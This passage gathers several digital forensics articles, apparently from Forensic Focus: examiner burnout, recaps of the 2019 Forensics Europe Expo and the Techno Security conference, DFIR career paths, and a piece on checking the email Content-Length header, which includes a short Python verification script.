  • Unsatisfying assignments, as well as lack of advancement opportunities or professional development.
  • Personality conflicts or working with toxic people at any level.

Forensic examiners both in and out of law enforcement can experience these factors. Work demands can seem neverending, especially if your forensic lab is understaffed, the volume of evidence suddenly increases, you have — as Shavers recalls from his own experience — other hats to wear, or your overall environment is fast-paced with a lot of productivity demands. As Huber succinctly put it: “too many hours and too much travel.”

While many agencies have dedicated budgets and resources to developing professional digital forensics examiners, others still include forensic labs in required rotations. That means that as much as you might love digital forensics work, another investigator might regard it as an “unsatisfying assignment.”

Indeed, sometimes burnout is the result of a misalignment of individual with the company or with the role. Huber notes “the tempo and politics of giant corporations,” while Bejtlich likewise writes:

The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye’s culture and managerial habits, and I wondered what I was doing inside such a different company.

That isn’t to say employees of small or medium companies can’t also experience burnout. Startups, for example, demand employees who can, for all intents and purposes, juggle twelve flaming swords while balancing one-footed on a tightrope for twenty hours straight.

In the forensics world, this might mean not only performing digital forensic examinations, but also finding new business, nurturing existing clients, making presentations to local groups, dealing with finances, and other aspects of running a business. Furthermore, as a company grows and its priorities shift, employees must adapt, sometimes more rapidly than they might be comfortable with.

One final factor: the nature of the job itself. Digital forensics examiners are routinely exposed to some of the most traumatic visual and auditory content you never wanted to imagine. Those responsible for analyzing evidence of child exploitation and terrorism content can experience “secondary traumatic stress,” according to a wide range of scholarly research.

Additional stressors, writes Dan Schmidt in a research paper, come from law enforcement colleagues who don’t value digital investigations because they aren’t “hands-on” enough (ironically an argument for mandatory rotation), a lack of appropriate training, and insufficient legal and procedural guidance. Schmidt notes that another source of stress can come from having to interact with suspects online, maintaining a less-than-savory undercover identity.

The impact of employee burnout

Burnout has personal, physical consequences for individuals, according to the Mayo Clinic piece. These include heart disease, high blood pressure, Type 2 diabetes, and a suppressed immune system.

Extrapolate that out to multiple employees, however, and you have to start to consider burnout’s broader implications. Another Forbes article details the business impact of burnout. It increases a company’s healthcare spending, for one, and can contribute to employee attrition.

That, of course, affects hiring and training budgets, as well as productivity for employees who are left behind. In a tight year, if the empty position is eliminated, other employees are at risk for burnout from the increased workload.

Of course, digital forensics isn’t the kind of profession where burnout can or should be allowed to fester for very long. It’s no exaggeration to say that digital forensics work impacts justice in the most profound way. From victim rescue to determining whether a person could lose their freedom, few stakes could be higher.

That makes a burned-out examiner an even bigger risk in digital forensics than in many other professions. Disorganization, procrastination, corner-cutting, and other work-quality killers could lead to mistakes that might result in the wrong suspect walking free — or the failure to save victims.

Dealing with burnout as an employee

Digital forensics tools have, to some extent, begun to reduce examiners’ exposure to traumatic content by deploying artificial intelligence and other technology. When these tools are available, use them — but don’t rely on technology exclusively to prevent burnout.

Shavers writes:

“I have never been approached with advice or support or suggestions or offers to take some of the burden, so I quickly learned that it is up to me to recognize where my pain threshold is and to take proactive measures to not cross that burnout line. My suggestion is that you should never expect anyone to tell you that you need a vacation. You have to check yourself constantly. Consider yourself lucky if someone else tells you that you need a break. And take the advice because they may see something you don’t.”

As for how to actually deal with a case of burnout? That’s largely up to you. The PoliceOne.com article lists six ways to prevent and manage burnout. For example, play harder than you work, making time for “laughter, fun, and excitement” with outside hobbies and interests. Huber took up shooting; Bejtlich, krav maga; while Shavers noted the importance of family.

You should also surround yourself with positive people who can model good coping and problem-solving skills and make you feel good when they’re around. Work on resiliency and self-care, including diet, exercise, and sleep, and do good by volunteering with an organization outside of law enforcement and your identity.

Non-work activities are also mentioned in the New York Times piece:

Mr. Crawford changed his lifestyle after he realized it made him miserable. Now, as an entrepreneur-in-residence at 500 Start-ups, an investment firm, he tells fellow founders to seek out nonwork-related activities like reading fiction, watching movies or playing games. Somehow this comes off as radical advice. “It’s oddly eye-opening to them because they didn’t realize they saw themselves as a resource to be expended,” Mr. Crawford said.

If you’re a highly sensitive person, like marriage and family therapist Brooke Nielsen, you might need to find different strategies like the ones Nielsen outlines. These could include a regular meditation or journaling practice, a reordering of your schedule, changes to your work responsibilities, or another job — or career — entirely. Huber writes:

If you do find yourself burned out, there isn’t anything wrong with making a change and finding different pastures, but it’s best to make those changes when it’s not a response to getting the point of being burned out in the first place. One of the best hedges against this is having activities outside of professional life that help manage stress and give you an opportunity to do something meaningful outside of career life.

Bejtlich recommends talking about it, acknowledging that it’s a difficult subject to discuss. It can be nerve-wracking to approach a boss or colleagues who may not understand, especially if you’re concerned that their lack of understanding will lead you out the door altogether.

However, while it may be true that “the only way out is through,” you should be able to go “through” together with leaders, mentors, colleagues, friends, and family you trust. If you don’t feel you can trust these people, you need new people (including changing jobs if required).

Finally, consider professional therapy. In particular, Eye Movement Desensitization and Reprocessing (EMDR) therapy may help first responders experiencing secondary traumatic stress.

Dealing with burnout as a manager

At a time when #DFIR Twitter is awash with discussions about the talent shortage, addressing burnout takes more than an individual’s capacity to source the company Employee Assistance Program or read through all the Google Search results on the topic. It’s not a sign of a weak employee, so much as the result of normal employees who have been pushed to their breaking points.

The tricky part is that everyone’s breaking point is different. Shavers writes about:

“… regularly bringing myself to the burnout line, because that is the way I am. I enjoy working hard, solving problems, and moving on to the next challenge….

“I believe that most everyone in InfoSec (DF/IR) has the same type of personality. We see broken things and want to fix them. When we don’t see broken things, we break things and try to rebuild improved versions of what we just broke. That’s the nature of problem solvers.”

Rather than viewing burnout as being strictly a personal problem, individuals — both employees and managers — should pay close attention to the environment they’re working in, and the one they’re creating either actively or passively. It may be that one burned-out employee is a signal of a problem that could end up affecting more than just that person.

You can hire and train for resiliency, as this PoliceOne.com article pointed out; traits like high self-esteem might be ingrained (and develop over time with a consistently positive work environment); while other traits, like flexibility, optimism, and the ability to move on, might be teachable.

You can also make sure you’re supporting examiners in your lab by purchasing the right tools, and sending them to the right training — including, if possible and relevant, courses offered by organizations such as the Innocent Justice Foundation’s SHIFT Wellness. Even tool-specific training, though, can help examiners when they know how to use features that limit their exposure to traumatic content.

For both individuals and cultures, just because something is, doesn’t mean it has to be that way. Company and department culture is a choice, and it’s up to everyone to participate — even if it means shifting priorities or assumptions.

That’s where articles like the Forbes piece on bucking the “cult of busy” habit can help. It outlines not just day-to-day changes for individuals to make, but also lists some of the ways companies (or to some extent, departments) can change their culture.

In the DFIR and infosec worlds, companies that prioritize, for example, time for employees to take vacations and pursue personal goals in between engagements might have a leg up on those that don’t. If you’re interviewing, ask how the company empowers and aids responders to avoid burnout; if you’re employed, become an advocate if you think things could be improved.

Managers and colleagues themselves can be a line of defense, as well, as Shavers points out:

“I look for burnout in others. And dude, if I see it, I am on it like no one’s business. If it comes down to me just giving a hug, a pat on the back, or having a serious sit-down, I do it on the spot. Consider that if you see burnout in someone, that is a problem. You are a problem solver. Go solve that problem. You might end up doing more than just saving someone’s job.”

Most importantly, burnout shouldn’t be treated as a breakdown. Rather, it’s an opportunity for everyone to learn and grow: for individuals to process their own limits, and for organizations to rethink how they do business.

Forensics Europe Expo London 2019 – Recap


by Jade James 

This article is a recap of some of the main highlights from the Forensics Europe Expo 2019, which took place in London, UK on the 5th and 6th of March.

The Forensics Europe Expo has now run for seven years and is co-located with the Security & Counter Terror Expo at Olympia London. The expo has truly established itself as a must-visit event, with 2,500 professionals visiting exhibitors, attending seminars and workshops, and of course networking over the course of the two days.

The Expo offers the opportunity for visitors to experience first-hand innovative and cost effective solutions in the field of digital forensics and the more traditional wet forensics, provided by over 60 international suppliers. As well as the opportunity to attend the educational features where you can watch live demonstrations, there are also workshops on topics ranging from drone forensics to digital evidence management. All seminar sessions are CPD accredited.

Key speakers included Brian Cusack (Director of the Cyber Forensic Research Centre, AUT University) talking about making sense of international standards in digital forensics; Gareth Davies (Academic & Cyber Consultant, University of South Wales) giving a talk on ‘Vehicle Data Forensics on Unsupported Systems’; Dr Gillian Tully (Forensic Science Regulator) talking about ‘Quality Standards in Forensic Science’; and Martin Parker (Chief Scientist, National Ballistic Intelligence Agency) who gave a talk entitled ‘NABIS: A Ballistic Focal Point for the UK’.

Exhibitor Highlights

The Forensics Europe Expo is an opportunity to showcase industry developments and innovations in digital forensics.

Amped Software launched a new product at the Expo: an enhanced video player for modern policing. Replay allows users to analyse video evidence in the early stages of an investigation. A more in-depth review of Replay will be published on Forensic Focus shortly.

SecurCube PhoneLog by SecurCube is software used for phone records analysis. They have launched an academic project which aims to supply SecurCube PhoneLog technology to existing academic partners’ labs, creating a learning and training programme.

Compelson Labs launched their MOBILedit Forensic Express PRO version, which is able to extract deleted data from phones and applications, including call history, contacts, SMS, MMS, photos, and video data from apps such as Facebook, WhatsApp, Viber, and Signal. This software is used by governments, police and law enforcement, the FBI and investigators worldwide, and it is regularly tested by the US government’s NIST lab.

OpenText informed visitors about future updates to be included on TX1, consisting of a lock screen with which users can apply a PIN to the TX1 to ensure that unauthorised users are unable to gain access during the imaging process. Another feature to be included is the ability to power down drives: after a length of inactivity set by the user, the source or destination drive would power down in order to save energy and extend the life of the drive. There was also a suggestion of giving the TX1 more compatibility with EnCase, and further enhancements to triaging, such as being able to preview documents and pictures directly from the TX1.

Magnet Forensics are now officially partnering with Grayshift, and GrayKey is now available for purchase directly through Magnet for law enforcement agencies only. Magnet maintains that they are the best solution for processing GrayKey images using Magnet AXIOM, although Cellebrite and BlackBag Technology‘s tools also have the capability of processing GrayKey images.

Conference Highlights

The Forensics Europe Expo is free to attend once you have registered, however those who pay to attend gain access to the FEE conference, which was produced by Digital Forensics Magazine this year. The conference focused strongly on artificial intelligence in digital forensics; drone data analysis; digital forensics as applied to vehicles; and the challenges presented by the introduction of digital forensics international quality standards.

Day one was dedicated to future challenges for those involved in digital forensics and digital investigations. Professor Brian Cusack delivered a talk outlining the inter-related agreements for evidence exchange and delivering a roadmap for standard information access and optimal use. Scott Zimmerman talked about the challenges of gathering evidence from multiple remote systems, including social media and the dark web, and used a couple of case studies (the Target store credit card breach and Fero v Excellus Health Plan Inc.) to demonstrate this.

Dr Raffaele Olivieri talked about the contextualisation of data collection during digital forensics analysis and overcoming the challenges of working with high amounts of heterogeneous data or ‘Big Data’. He also discussed the introduction of AI to aid the processing of such data. Zeno Geradts presented Artificial Intelligence in Digital Forensic Science, assessing the current state of AI and its role in systems from AFIS (Automated Fingerprint Identification System) to digital forensic software. Within the digital forensics community there seems to be a drive towards automation, to process large amounts of complex data using AI with minimal user intervention in order to save time and effort in manual investigations. The DigForASP group was also introduced: it aims to create networks to explore the potential for applying methods of artificial intelligence and automated reasoning in the digital forensics field. Membership in DigForASP is open to research groups from universities and other organisations working in the areas covered by the group.

Gareth Davies’ talk focused on vehicle forensics and showed attendees how to approach a vehicle from a digital forensics perspective. There was also a summary of the range of different infotainment systems from popular manufacturers and an exploration of the data extraction methods and data types that can be used as digital evidence. On a similar topic, Gabriella Ahmad-Assalemi talked about driver attribution for digital forensics investigations on connected cars. As it becomes more common to be able to extract and analyse a wealth of digital information from cars, such as recent destinations, favourite locations, routes, and personal data (e.g. call logs, contact lists, SMS messages, pictures, and videos), vehicle forensics is becoming a more prevalent branch in the field as a whole. The challenges stem from the lack of extraction tools that support the file formats of the various proprietary infotainment systems. Manufacturers are reluctant to provide their specifications to vendors so that the vendors can update their tools sufficiently.

Day two set out to explore the wider forensics process, from laws and standards to new techniques and innovative technologies being developed across the world. ISO 17025 is a quality standard which has become a requirement of all UK digital forensics laboratories, in order to regulate the quality of digital evidence being submitted into the criminal justice system. Dr. Gillian Tully discussed quality standards in forensic science and offered best practices and suggestions on how practitioners can deliver the best quality of forensic science to the criminal justice system.

Throughout the day alongside the conference agenda there were workshops which were free to attend. These focused on the demonstration of tools from exhibitors.

Stuart Hutchinson from BlackBag Technologies kicked off the first day with a talk on APFS Forensic Analysis. New releases of MacQuisition and BlackLight will now be able to acquire and analyse encrypted APFS devices, including those that have encryption set by default and/or contain the new T2 hardware-assisted encryption chips.

Tanya Pankova of Oxygen Forensics discussed the use of Oxygen to extract WhatsApp data from a locked device using a WhatsApp QR token from a PC. The talk also guided attendees through the process of WhatsApp decryption on iOS and Android devices, offering the alternative method using a phone number. It was interesting to note that although WhatsApp offers end-to-end encryption, the media items on WhatsApp are not encrypted.

AccessData gave a talk on drone forensics and the investigation of unstructured data (which does not have a predefined data model) using their Quin-C laboratory platform which boasts deep machine-learning capabilities. Points to note: not all drones have the same artifacts and data is stored at various locations including onboard flash, removable storage and volatile memory.

Also on the theme of drone forensics, MSAB’s Paul Baxter gave a talk on how to extract and examine data from drones using XRY Drone and XRY XAMN, and announced the introduction of ‘The Drone Code’: UK legislation which states the changes to the restrictions on flying drones near airfields from 13 March 2019 onwards, and the new amendment which states that you will need to register as an operator of a drone. There were also mentions of multi-rotor vs fixed wing components; drone plus ground control, camera (sensor/servo) and mobile device/tablet. Data extraction can be achieved through direct USB connection; camera data can be extracted from SD cards (which can sometimes be internal); and data from the mobile device linked to the operation of the drone can also be extracted.

Oleg Afonin of Elcomsoft gave a very interesting talk on iOS forensics. Visitors were presented with an overview of the entire iOS forensic workflow, including iOS 12, and how the USB Restricted Mode (RM) affects the ability to extract data. Things to consider when handling iOS devices are as follows: if you turn off an iOS device, you will lose the encryption key which is stored in RAM. Handling iOS devices incorrectly can kill your investigation (for example, attempting to guess the passcode or using Face ID will waste 1 out of 5 attempts you have to unlock the device). Since iOS 11.4.1, USB restricted mode engages after one hour since the last unlock state. From iOS 12 onwards, USB restricted mode engages immediately, and will automatically engage if a user has not connected to a trusted device for three days. It was also useful to learn about settings which are affected by USB restricted mode, such as lockdown records and passcode recovery (although Grayshift claims to bypass USB RM). Unlocking a device using biometrics is unavailable after a cold boot, therefore the passcode will be necessary. Furthermore, we were given information about what happens when you reset all settings on iOS devices. The following settings will be erased: display brightness, display battery percentage, all Wi-Fi passwords (but not any passwords or tokens which are stored in the keychain), com.apple.wifi.plist and iTunes backup password (all existing lockdown (pairing) records, data and all keychain items (except Wi-Fi) are preserved).

As well as the conference and workshops there were over 60 exhibitors to visit, of which 25 were specifically related to digital forensics. The Forensic Focus stand had a lot of visitors interested in learning more about the website and gaining access to resources, and it was nice to see familiar faces within the digital forensics community. At the end of the first day of the Expo, networking drinks were held in the VIP and Delegation lounge, where many visitors gathered and discussed events from the first day.

The Forensics Europe Expo is a good opportunity to gain information about the latest in trends and innovations within digital forensics. It was also the perfect opportunity to reach out to vendors and have live demonstrations of tools which are used in investigations (and pick up some goodies, including free trials of software). I was given live demonstrations of BlackBag’s Blacklight and Amped’s Replay. There is definitely a lot to see and experience even as a free visitor.

The next Forensics Europe Expo 2020 will be held at the London ExCeL from the 19th to 21st May 2020. Keep an eye on the official website for details.


Using The Content-Length Header Field In Email Forensics


by Arman Gungor

As forensic examiners, we often have to analyze emails in isolation without the benefit of server metadata, neighbor messages, or data from other sources such as workstations. When authenticating an email in isolation, every detail counts—we review a long list of data points such as formatting discrepancies within the message body, dates hidden in MIME boundary delimiters, and header fields.

One data point I often see being overlooked is the Content-Length header field. The value this field contains can be leveraged for a simple but powerful check to verify an email’s payload. In this post, I will discuss how we need to preserve emails to be able to utilize the Content-Length header field, how to utilize the data in this field, and a couple of use case scenarios. Let’s start by defining Content-Length.

What Is Content-Length?

Content-Length is mentioned in the Common Internet Message Headers memo as one of the non-standard message headers. It is used by some email providers such as Yahoo and AOL, and it contains a decimal number representing the number of bytes found in the payload of the message.

Let’s take a look at an example message:

The Content-Length header field for the above message is populated as 1981. If we count the number of characters in the message after the message header, including the newline character on the blank line following the Content-Length header field and the new line characters at the end of each subsequent line, we find that the number of characters in the message payload is in fact 1981.

TIP: You can count the characters very quickly by using a text editor. I use BBEdit on Mac and UltraEdit on PC, and they both count the characters automatically when you highlight the text. It is important that you count the line breaks as a single byte as in Unix (LF), not as two bytes as in Windows (CR/LF). If you are doing this on a Windows system, you can achieve this by setting up your text editor to use Unix-style line endings.

Here is a quick screen capture showing how we can count the characters:

Figure 2 — Calculating Payload Size

The sample message I used above was a short one to make illustration easier. This technique also works for much larger messages, including ones containing several attachments.

How Can We Use the Content-Length Field in Email Forensics?

It’s not hard to imagine how the Content-Length header field can be useful in a forensic examination. For instance, if we are looking at an authentic email acquired from Yahoo, we should expect the message payload to agree with the value found in the Content-Length field. A discrepancy might mean that the message body, the header, or both might have been manipulated.

In order to utilize this data point, the target email message should be preserved in its original form. For instance, if you logged into Yahoo webmail and used the “view raw message” menu item and saved the message as an EML, you could utilize the Content-Length value in your forensic exam. Similarly, acquiring the messages using Forensic Email Collector results in a hash match with the manual method above, and lends itself to a content-length comparison.

If you are not focused on a single message, but you are looking at a larger data set, you could automate things by writing a script to scan a folder full of MIME messages (e.g., FEC’s MIME output folder) and compare their Content-Length values to their payload byte counts in bulk. You can then log the discrepancies and take a closer look at them as part of your email examination workflow.
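The following script is an added example (not the author's code or a Metaspike tool) that implements both the manual count described under "What Is Content-Length?" and the bulk folder scan described above. It follows the article's counting convention, where line breaks count as a single LF byte and the newline of the blank line that ends the header block is part of the payload; the sample messages are constructed for illustration and the folder layout (one .eml file per message) is an assumption.

```python
"""Content-Length consistency check for raw RFC 5322 messages (added example)."""
import os
from typing import Dict, Iterable, List, Optional, Tuple


def _split_message(raw: bytes) -> Tuple[bytes, bytes]:
    """Split a raw message into (header block, payload).

    Line endings are normalised to a single LF first so the count does not
    depend on whether the file was saved with Unix or Windows line breaks.
    Per the article's convention the payload starts with the newline of the
    blank line that terminates the header block.
    """
    text = raw.replace(b"\r\n", b"\n")
    idx = text.find(b"\n\n")
    if idx == -1:
        return text, b""  # headers only: there is no payload to count
    return text[:idx], text[idx + 1:]


def declared_content_length(header_block: bytes) -> Optional[int]:
    """Return the integer Content-Length value, or None if absent or not numeric."""
    # Unfold continuation lines (RFC 5322 folding starts them with whitespace).
    unfolded = header_block.replace(b"\n ", b" ").replace(b"\n\t", b" ")
    for line in unfolded.split(b"\n"):
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"content-length":
            value = value.strip()
            return int(value) if value.isdigit() else None
    return None


def check_message(raw: bytes) -> Dict[str, object]:
    """Compare the declared Content-Length with the measured payload length."""
    header_block, payload = _split_message(raw)
    declared = declared_content_length(header_block)
    actual = len(payload)
    if declared is None:
        status = "no-header"
    elif declared == actual:
        status = "match"
    else:
        status = "mismatch"  # body, header or both may have been altered
    return {"declared": declared, "actual": actual, "status": status}


def scan_messages(messages: Iterable[Tuple[str, bytes]]) -> List[Dict[str, object]]:
    """Bulk check: one result per (name, raw bytes) pair, name attached."""
    results = []
    for name, raw in messages:
        result = check_message(raw)
        result["name"] = name
        results.append(result)
    return results


def scan_folder(folder: str, suffix: str = ".eml") -> List[Dict[str, object]]:
    """Check every *.eml in a folder; files are read in binary so line endings survive."""
    def read_all():
        for entry in sorted(os.listdir(folder)):
            if entry.lower().endswith(suffix):
                with open(os.path.join(folder, entry), "rb") as fh:
                    yield entry, fh.read()
    return scan_messages(read_all())


# Constructed sample messages, not real mail. The first is self-consistent:
# payload = "\n" (blank line) + "Bob,\n" + "\n" + "Figures attached as discussed.\n"
#           + "Alice\n" = 1 + 5 + 1 + 31 + 6 = 44 bytes.
SAMPLE_OK = (
    b"From: alice@example.com\r\n"
    b"To: bob@example.com\r\n"
    b"Subject: Quarterly numbers\r\n"
    b"Content-Length: 44\r\n"
    b"\r\n"
    b"Bob,\r\n"
    b"\r\n"
    b"Figures attached as discussed.\r\n"
    b"Alice\r\n"
)

# Same header, but the body was edited afterwards: the count no longer agrees.
SAMPLE_TAMPERED = SAMPLE_OK.replace(b"Figures attached", b"Revised figures attached")

# A provider that does not set the field at all.
SAMPLE_NO_HEADER = SAMPLE_OK.replace(b"Content-Length: 44\r\n", b"")


if __name__ == "__main__":
    rows = scan_messages([("ok.eml", SAMPLE_OK),
                          ("tampered.eml", SAMPLE_TAMPERED),
                          ("no-header.eml", SAMPLE_NO_HEADER)])
    for row in rows:
        print(f"{row['name']:14} declared={row['declared']} "
              f"actual={row['actual']} -> {row['status']}")
```

Point `scan_folder` at a preserved MIME output folder and filter the results for `status == "mismatch"` to get the list of messages that deserve a closer look.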

Another use case can be when examining a fraudulent message that was created by repurposing an already existing, legitimate message. If the fraudulent message and the legitimate message have the same Content-Length header field value, and that value matches only the payload length of the legitimate message, this could be a valuable data point that can be used to show which message is the true copy.

What Not To Do

Every character counts when calculating the byte count of the message payload. If the message changes in any way, including text encoding and MIME boundary delimiters, the calculation would be thrown off.

You will find that if you acquire the messages and convert them to another format, the Content-Length value often no longer matches the payload length—even if you convert back to MIME format. For instance, acquiring the messages using Outlook, ingesting the resultant OST into your email investigation tool, and then going back to EML format, in my experience, does not work. This is one of the reasons why I recommend keeping the MIME format of the messages during forensic preservation. The amount of additional disk space is often negligible compared to the forensic value you get.

Conclusion

Not every message header contains the Content-Length field. But when available, Content-Length can be a very valuable data point during forensic email investigations. In order to make use of it, forensic examiners should make an effort to preserve emails in the format that is the closest to the original format of the email. In most cases, this is MIME format as defined by RFC 5322.

If your target message contains the Content-Length header field, don’t simply ignore it. Research how that field is populated for the service provider you are dealing with, and determine whether its contents are consistent with how the field would be populated for a legitimate message.

References:
RFC-5322: Internet Message Format
RFC-2076: Common Internet Message Headers

About The Author

Arman Gungor, CCE, is a digital forensics and eDiscovery expert and the founder of Metaspike. He has over 21 years’ computer and technology experience and has been appointed by courts as a neutral computer forensics expert as well as a neutral eDiscovery consultant.

Career Paths In Digital Forensics


by Christa Miller, Forensic Focus

In the 30 or so years since the advent of personal computers made digital forensics a viable career path, the profession has matured to the extent of making multiple career paths possible. Now, professionals who are interested in digital forensics have options that range from law enforcement and government investigations, to corporate and self-employed consulting — and often switch between tracks.

Of course, having so many options means that forensic professionals have to be intentional about setting and following their course. The field continues to evolve, so new options may make themselves available in the short or long terms.

On the other hand, whether professionals will be available to fill those roles is a key question. A recent SANS Institute study showed that while nearly one-third of 4,000 surveyed high-schoolers across Europe, the Middle East, and Africa (the EMEA region) were interested in IT as a broad career field, only half of those students were specifically interested in a cybersecurity career, which sees stiff competition from careers in app and software development, IT system design, artificial intelligence and robotics, among others.

Helping students to understand what’s possible and what’s on the horizon, then, will become increasingly important for employers, parents, teachers, and others with a stake in the future of cybersecurity and DFIR. What possibilities exist, and how can forensic professionals flexibly plan for the future?

Identifying DFIR Career Paths

Defining what counts as digital forensics is relatively easy. In 2001, the Digital Forensics Research Workshop (DFRWS) defined it as: 

“The use of scientifically derived and proven methods toward the preservation, collection, validation, identification, analysis, interpretation, documentation and presentation of digital evidence derived from digital sources for the purpose of facilitating or furthering the reconstruction of events found to be criminal, or helping to anticipate unauthorized actions shown to be disruptive to planned operations.”

Or, as information security expert Lesley Carhart put it more succinctly: “… the exciting science of taking all manner of digital stuff, and finding out what it’s done, when it was done, and who did it.”

Defining where digital forensics sits, however, is a little trickier. Because the skills outlined above are useful to more than just criminal investigations, as a digital forensic professional you might find yourself working:

  • Alongside litigation support professionals during e-discovery prior to a major corporate lawsuit.
  • As part of a cybersecurity incident response team (CSIRT), analyzing breached systems to find the root cause that will be used to apply patches.
  • In support of corporate investigators of insider threats, employee misconduct, and related issues.

That isn’t to say you won’t find yourself squarely working investigations for law enforcement, a national government agency, or a corporation. These roles continue to be in high demand locally, nationally, even internationally. Forensic expertise is also valuable to software vendors in the form of subject matter expertise that can inform training, marketing and sales, product development, and other areas.

Where you end up working may be a function of a particular area of technical expertise. For instance, you might:

  • Focus on computers, mobile devices, networks, the cloud, and/or Internet of Things (IoT) devices.
  • Or, you might want to understand the interplay of evidence among all these storage locations across networks.
  • Develop deep data recovery expertise, which can be valuable to entities needing assistance with unlocking a damaged or unusual device.
  • Choose to specialize in certain types of media such as digital images or audio/video.

Deciding Which Career Path To Take

Many forensic professionals evolved their careers along with the profession itself. For example, when mobile devices’ popularity began to take off, law enforcement forensic examiners who had cut their teeth on computer forensics were often the only people in their agency equipped to figure out how to acquire data from phones.

To some extent, evolving along with digital trends still happens. Witness the interest in drone and Internet of Things forensics, developing artificial intelligence-powered forensic tools, and so on. With digital forensics now more mainstream in both public and private sectors, though, figuring out which path to take requires careful consideration.

In his “Life After Law Enforcement” blog series, Eric Huber lays out quite a number of considerations. Among these:

  • Mission. “Law enforcement agencies are put upon this earth to put bad people behind bars,” Huber writes, in contrast to private companies, where the goal is to turn a profit.
  • Compensation and benefits. One may appear more attractive than the other, but beware hidden costs.
  • Job security and the rate of change, as well as your own tolerance for risk, organizational politics of different flavors, and what you’re willing to do to mitigate risk.
  • How you feel about where you are currently.

Huber also covers the different flavors of a private-sector career, including both corporate and consulting work.

The Skills You Need For A Digital Forensics Career

To some extent, learning on the job will always be a part of DFIR. Technology changes too fast for forensic professionals to be able to get too comfortable in a particular specialty area. When smartphones fall out of fashion, for instance, in favor of wearable devices that store data in the cloud, “mobile forensics” may just come to mean something new.

At that point, it’s more about focusing on developing your underlying expertise — the foundational skills you’ll need when working with any set of 1’s and 0’s, regardless of where they came from.

In its recent blog post, the EC Council outlined several of these foundational skills, including:

  • Technical aptitude, or understanding how computer-based systems work so you can devise the best methods for obtaining data from them. It’s also wise to develop the knowledge of how illicit material gets on a target device, or how it moves around targets, in addition to cybersecurity threats, vulnerabilities, and how different breaches occurred.
  • Analytical talent and skill; a prerequisite to both obtaining and maintaining this technical knowledge. Not only acquiring, but also accurately interpreting digital evidence is a must.
  • Strong communication skills, both written and verbal. In particular, you’ll need to know how to explain results to the least technical of audiences at numerous levels, such as jurors. As an addendum, a working knowledge of different facets of law and general investigative techniques may be helpful to communicate effectively with attorneys and investigators.

Your willingness to learn is the final takeaway of the EC Council’s article. The industry’s constant evolution demands forensic professionals who are dedicated to continuing education, whether by participating in formal training, informal forum and social media discussions, their own research, or reading academic articles, books, etc.

Meeting Challenges In DFIR Careers

Nothing worth doing is without its challenges, and DFIR is a field that comes with a number of unique ones. When it comes to building your career, for example, you might find that some of the following aspects challenge you.

What you thought you were interested in might not capture your attention after all. At the college level, this might mean changing your thesis topic, your minor, or even your major. At work, it might mean finding a job in a different agency or company, location, or a different profession.

These decisions can be difficult to make because of the “sunk cost” of effort and money you’ve put towards attaining your qualifications. Remaining in a poor fit, however, ultimately does both you and your organization a disservice.

Resource constraints and operational demands in your work environment may mean that you don’t get to do the research you hoped to do, or even focus on the kinds of devices and problems you hoped to be able to work on. You may even, as Huber pointed out, be limited in advancement due to organizational policies. This can happen in both private and public sectors.

You could have supervisors who don’t understand the work you do, making it harder for you to champion growing your lab or even maintaining tools and service agreements. Training is expensive, yet is often one of the first budget line items to be cut in lean times.

The work you do may be psychologically taxing and even harmful. Burnout is a real phenomenon, and the job can result in secondary traumatic stress if you don’t learn and use the tools to head it off.

How do you address these challenges? Many forensic practitioners recommend having a mentor. Whether this person is a faculty member at your college or university, a supervisor, a senior person in your lab, or even someone you connected with online or at a conference, mentors can help you navigate the uniquely challenging aspects of a digital forensics career.

In addition to mentors, it’s wise to build relationships with other practitioners in the DFIR community. Whether you attend one or more conferences in the course of a year, or make the time to connect with others online — here on the Forensic Focus forums, on Twitter, or on a dedicated Slack channel, for instance — regularly talking with others can also help you to set and manage expectations, make good decisions, and even inspire new research or other ways to contribute.

What DFIR Has To Offer

Many longtime members of the profession report a great deal of personal satisfaction in their roles. Stress is considered a small price to pay for the ability to hunt and catch child predators, terrorists, and other bad actors — and to rescue their victims, prevent additional harm, and bring justice. With a career path you intentionally set and follow, acquiring the skills you need, and a plan for addressing challenges that arise, digital forensics can be a lasting career that brings good to the world.

Techno Security And Digital Forensics Conference CA 2019 – Recap


by Mattia Epifani

The Techno Security and Forensics CA conference took place between 11th and 13th March at The Hilton Torrey Pines in La Jolla (San Diego). More than 200 attendees were present, coming from different fields like digital forensics, e-discovery, incident response and cybersecurity. Most of the attendees were from the U.S. but many people from Canada and Europe were also present.

Forensic Focus was present for the entire conference and documented it in real-time on Twitter. The conference had four different tracks (Forensics, Audit/Risk Management, Information Security and Investigation) and more than 75 talks took place there.

This article is a wrap-up of the conference highlighting some of the most interesting and innovative topics, with particular regard to the Forensics and Investigations tracks.

As a general consideration we saw a lot of development and interest in three fields:

  • improving acquisition and analysis techniques of “traditional” devices like computer and mobile devices, both in the field and in the lab;
  • studying emerging sources of evidence (in particular IoT devices, drones, vehicles, DVRs, and so on);
  • developing techniques to acquire data from remote sources (email, cloud, etc.).

11th March 2019 – Day One

The first day started with a talk by Atola Technology on evidence acquisition: where it has been, where it is today, and recent breakthroughs.

In parallel, an interesting session on DVR forensics was run by DME Forensics: during the talk two real cases were discussed, one involving a Samsung DVR and the other involving a Q-See DVR.

Immediately after this a second session took place. We highlight in particular an in-depth presentation by Brian Hill, Oxygen Forensics, on deleted data from iOS and Android smartphones, illustrating possible ways to recover it from different sources (cloud or external media). Vico Marziale from Blackbag Technology gave a really interesting presentation on the forensic analysis of Windows 10 with particular highlights on the Windows Timeline Database, the Windows 10 Notification Center and the Background Activity Moderator (BAM).

On the investigation side, a talk by Angel Grant, RSA, discussed how to understand cultural aspects of hacking to improve cyber investigations: this is absolutely a field in which traditional investigators need to be trained more.

After the lunch break, a talk on mobile app analysis by James Eichbaum, MSAB, took place: the main topic was on manual analysis of SQLite databases and application data in general, with particular highlights on embedded objects, encoding and encryption.

Another really interesting talk was held by Arman Gungor from Metaspike, on leveraging server metadata in forensic email investigations. The presentation illustrated in particular what types of email metadata are kept by servers, and how to retrieve and forensically preserve those metadata.

